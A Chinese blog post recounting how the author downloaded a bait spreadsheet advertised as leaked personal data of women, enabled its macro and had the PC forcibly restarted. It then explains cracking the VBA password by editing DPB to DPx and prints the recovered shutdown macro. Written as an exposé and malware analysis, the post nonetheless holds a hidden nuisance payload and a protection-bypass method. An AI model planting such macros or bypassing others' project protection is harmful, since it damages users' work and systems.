昨天在Telegram上看到有人在大量发布倒卖个人隐私信息的消息“ 全国选取最美校花报名信息个人资料联系方式详细
xls”、“ 全国伴游网女性数据地区年龄身高电话微信QQ全有
xls”,上传到百度网盘、蓝奏云传播,通过8图片网生成二维码赚取灰色收入,每个压缩包解压密码69元(支付宝收款方为 南京罗兰布艺专卖店
),再附加上诱惑性诈骗PUA约炮资料“ 零成本睡女大学生,只付房费技巧分享
”。
今天随手搜索到了这些文档,其中有一个是全国伴游楼凤.xls,百度网盘Download之,打开Excel文档后醒目的提示含有VBA不安全宏脚本,启用之,中毒矣!瞬间电脑上打开的程序都自动关闭了,弹窗提示1分钟之内注销电脑并重启。
VBA宏脚本分析
当打开此文档的人启用过VB宏后,再点击任意一个单元格就会执行这个注销电脑登陆并重启的shell脚本。并且此宏模块无法编辑和查看,Alt+F11快速进入宏控制台界面,提示需要输入密码,被小人加密过。
VBA宏解密
如果是高版本的Excel格式不为xls的需要保存为
xls
,再使用 Notepad++打开,查找DPB
并修改为DPx
,再保存使用Excel打开,此时会报错,忽略即可。再按快捷键Alt+F11
打开VBA控制台,继续报错,忽略之。此时已经可以看到相关代码模块了,点击看到有Password处,修改密码。再到菜单工具
里进入VBAProject属性
进入保护
选项卡界面,设置密码并勾选查看时锁定工程
。等一会儿模块代码内容就加载出来了,可以看到这家伙只是用shell
脚本写了个关机重启的命令。
VB宏脚本
'Private Declare Function ExitWindowsEx Lib "user32" (ByVal uFlags As Long, ByVal dwReserved As Long) As Long
Public Sub msg()
'ExitWindowsEx ewx_reboot, 0
Shell "shutdown -r -t 3"
End Sub